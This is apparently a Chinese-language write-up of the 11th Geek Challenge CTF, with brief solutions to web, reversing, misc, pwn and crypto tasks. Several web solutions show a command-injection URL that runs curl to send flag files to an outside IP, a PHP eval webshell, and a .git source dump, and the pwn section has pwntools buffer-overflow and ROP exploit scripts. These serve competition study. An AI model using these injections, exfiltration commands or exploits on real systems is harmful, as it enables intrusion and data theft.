第11届极客大挑战writeup

Web朋友的学妹EZwww刘壮的黑页WelcomeEZgit我是大黑客ezbypass知X堂的php教程 ReNo RE no gain我真不会写驱动！WhatsApkHelloAndroidre00mazeHello .NET Misc一“页”障目壮言壮语秘技·反复横跳来拼图 Pwn数学咋样？runcodeliuzhuang-secretbaby_canary Crypto二战情报员刘壮铠甲与萨满成都养猪二厂规规矩矩的工作babyRSA韡髻猊岈跳跃的指尖childRSA

Web

朋友的学妹

F12，注释，base64解码

EZwww

url最后加www.zip拿到源码

<?php $key1 = $_POST['a']; $key2 = base64_decode('c3ljbDB2ZXI='); if($key1 === $key2) { //this is a true flag echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>'; } ?>

POST传参a=sycl0ver

刘壮的黑页

<?php include("flag.php"); highlight_file(__FILE__); $username = $_GET['username']; $passwd = $_POST['passwd']; if ($username === 'admin' && $passwd === 'syclover') { echo $flag; } ?>

get传username=admin,POST传passwd=syclover

Welcome

burpsuite抓包把GET改成POST

<?php error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allowed"); exit(); } else { if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){ show_source(__FILE__); } else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){ phpinfo(); // collect information from phpinfo! } }

POST传roam1[]=1&roam2[]=2，拿到phpinfo url后面加f1444aagggg.php用burpsuite抓包send to repeater再send

EZgit

用githacker

python GitHacker.py http://47.100.46.169:3902/.git/

我是大黑客

url最后加liuzhuang.php.bak

<?php eval($_POST['liuzhuang']); //谁是大恶人 那必定是我liuzhuang //当你的服务器看到 0xliuzhuang 就知道要买台新机器了 ?>

蚁剑连接 在根目录找到了flag

ezbypass

GET传a[]=1&b=1 POST传c=123a

知X堂的php教程

47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `find / -name flag`

47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `cat /flagggggggggggggg_1s_here/flag`

Re

No RE no gain

我真不会写驱动！

WhatsApk

拖进JEB，在Resources文件夹的values文件夹的strings.xml文件里找到了flag

HelloAndroid

拖进JEB，在字符串界面搜索SYC即得flag

re00

导出byte_4060数组

a = [23, 29, 7, 63, 55, 45, 41, 52, 40, 33, 27, 55, 45, 41, 52, 40, 33, 27, 60, 43, 54, 54, 54, 27, 54, 45, 35, 44, 48, 123, 123, 57] for i in a: print(chr(i^0x44),end='')

maze

Hello .NET

// WpfAppCS.MainWindow using System.Collections.Generic; using System.Windows; using System.Windows.Media; private void Check(object sender, RoutedEventArgs e) { string text = InputBox.Text; List<int> list = new List<int>(); int[] array = new int[22] { 18, 14, 40, -14, -2, 30, 10, 42, 35, 48, 43, 49, 52, 72, 57, 68, 86, 145, 115, 128, 115, 86 }; int num = 99; while (list.Count < text.Length) { bool flag = true; for (int i = 3; i < num; i += 2) { if (num % i == 0) { flag = false; break; } } if (flag) { list.Add(num); } num += 2; } bool flag2 = true; for (num = 0; num < text.Length && num < array.Length; num++) { if (list[num] - text[num] != array[num]) { flag2 = false; break; } } if (text.Length == array.Length && flag2) { Status.Foreground = new SolidColorBrush(Colors.Green); Status.Text = "Flag is corrent"; } else { Status.Foreground = new SolidColorBrush(Colors.Red); Status.Text = "Flag is incorrent"; } }

Misc

一“页”障目

宣传单两个字符串拼起来

壮言壮语

与佛论禅

秘技·反复横跳

foremost之后手动恢复二维码

来拼图

把有部分flag的图片拿出来拼在一起

Pwn

数学咋样？

from pwn import * context.log_level = 'debug' p = remote("81.69.0.47",1111) p.recvuntil("I have 20 tests") for i in range(20): p.recvuntil("!["+str(i)+"] ") temp = p.recvline() num_1 = int(temp[temp.find("num_1 = ")+8:temp.find("num_2 = ")-2],10) num_2 = int(temp[temp.find("num_2 = ")+8:]) p.sendline(str(num_1+num_2)) p.recvall()

runcode

#include<stdio.h> int a=0; char b,c[100]; int main() { FILE *fp1 = fopen("/home/ctf/flag","r"); fgets(c,100,fp1); puts(c); fgets(c,100,fp1); puts(c); fgets(c,100,fp1); puts(c); fclose(fp1); return 0; }

liuzhuang-secret

from pwn import * context.log_level = 'debug' p = remote("81.69.0.47",1000) payload = 'a'*0x78 + p64(0x40079B) p.sendlineafter("My house is quite big, Do you want to play with me?",payload) p.interactive()

baby_canary

from pwn import * context.log_level = "debug" local = 0 if local == 1: r=process('./baby_canary') gdb.attach(r,'b * 0x0400789') else: r=remote('81.69.0.47',3333) elf = ELF('./baby_canary') rdi = 0x400873 system = elf.symbols['system'] binsh = elf.search('/bin/sh').next() r.sendline(cyclic(0x68)) r.recvuntil('zaab') canary = u64(r.recv(8))-0xa print hex(canary) print hex(u64(r.recv(6)+'\x00\x00')) r.sendline(cyclic(0x68)+p64(canary)+p64(0xdeadbeef)+p64(rdi)+p64(binsh)+p64(system)) r.interactive()

Crypto

二战情报员刘壮

摩斯密码

铠甲与萨满

凯撒密码

成都养猪二厂

猪圈密码+栅栏密码

规规矩矩的工作

希尔密码，把key的矩阵求逆矩阵再和三个数组成的向量相乘，得到三个数对应三个字母

babyRSA

from Crypto.Util.number import * from gmpy2 import * from secret import p,flag flag = bytes_to_long(bytes(flag,encoding='utf-8')) q = getPrime(1024) n = q*p phi_ = (p-1)*(q-1) e = 0x10001 d = invert(e,phi_) c = (pow(flag, e, n)) print(long_to_bytes(pow(c, d, n))) print((c,q,n)) '''out put (177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194, 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043, 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149) ''' import gmpy2 import libnum c = 177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194 e = 65537 q = 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043 n = 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149 p = n // q d = gmpy2.invert(e, (p-1)*(q-1)) m = pow(c, d, n) print(libnum.n2s(m))

韡髻猊岈

https://www.guballa.de/vigenere-solver

跳跃的指尖

键盘几个字母包住的字母

childRSA

低加密指数广播攻击

from struct import * from gmpy2 import * def my_parse_number(number): string = "%x" % number #if len(string) != 64: # return "" erg = [] while string != '': erg = erg + [chr(int(string[:2], 16))] string = string[2:] return ''.join(erg) def extended_gcd(a, b): x,y = 0, 1 lastx, lasty = 1, 0 while b: a, (q, b) = b, divmod(a,b) x, lastx = lastx-q*x, x y, lasty = lasty-q*y, y return (lastx, lasty, a) def chinese_remainder_theorem(items): N = 1 for a, n in items: N *= n result = 0 for a, n in items: m = N//n r, s, d = extended_gcd(n, m) if d != 1: N=N/n continue #raise "Input not pairwise co-prime" result += a*s*m return result % N, N sessions=[{"c": 0xff24bddc5a7b327535af92dba58c5d62a22d542e6ba1df6f91c98c7563d8e48e770fb623bfcc2f09ed49788293306ff709670b225da32ea134422d5e403b11c39ef6b144f96b2fe94b3aa136432ecea86a4069a4cb0b4d8570edb3fb5bb2cf0693184ef0c589887b012ebe6ea94e854a71a7eb768133d15e784e388976877db, "e": 3, "n": 0xe096219878f492bcdb2a2d03995521e7a65125733bae18e7d0005e35343fea3653698de60231d29b2d1b44a0b4ffd3183855b9042275f769e1702fa8843062df0938821db0258af40ab3cda8e54eb6ac826d545df91dfe76266cb01b1d6fad39e6ef13ce730c1c2395136b0bbdf22c6b0daba63701d71c6ae70d4e06935b9941}, {"c": 0x895f8283e2200bab1bf938ce3b5e42147b53a5178e436ea0b64a2380ba99776d5ba8046ef722858b20d9650ee68c09e905030f1634e0b32397b7b12236a5a301e5923a294ef1bdf16458f4fc8677370ce2ce3d0fd957da7466e5b104191d454455917147f3187b758c1c468db1b35514391e5b36bd1ac39e91bbb24fdbc07872, "e": 3, "n": 0xa36b15a395edf3e99927f658e22d5f4aefd83434972c96cca5242a1aaa517ad83739451269723092dd9e73c00682dd3bbd74a985546def88196119b6d57b397283bc7b8b6029916df84284bec1725f6e5d3d29042af685c508a58ab6fb4e5bfeb326ae49330e3f4426abc1860ca4412feb976ee571075a47b854c9a6f5f0ebff}, {"c": 0x3bead3d6760bff4de22562978d4722bb21ee4792ebdb32703b6df9ff5176e033e97ad8fc81467f4b3df7bd4e8bcae09462f3eca93a3da1cd9d7e8de3e464471fdd0b70112c1c738b0daa2a37a65331eaa8954b81b410f62a0280da32eb3e305782d5f774d814ca0adb13344687387cf72657dc21724bcf69da810d7635b99467, "e": 3, "n": 0x9d4732db2539d1166dc6865670be11951bf49295bc8c472f34682a0fb7f2b3ba96dcfa1945c2e4685dfeae5255abe2ab3b7fb2282971bb16ce02d14082f71755e8a65c956e114336914a409a9f1158fb362a92c4e169fa3c460ea26fb5c6693447b14f1c3156a2d9308dd993d7ea708a00ad149fb77109d8a5f77de1703ba249}] data = [] for session in sessions: e=session['e'] n=session['n'] msg=session['c'] data = data + [(msg, n)] print("Please wait, performing CRT") x, n = chinese_remainder_theorem(data) e=session['e'] realnum = iroot(mpz(x),e)[0].digits() print(my_parse_number(int(realnum)))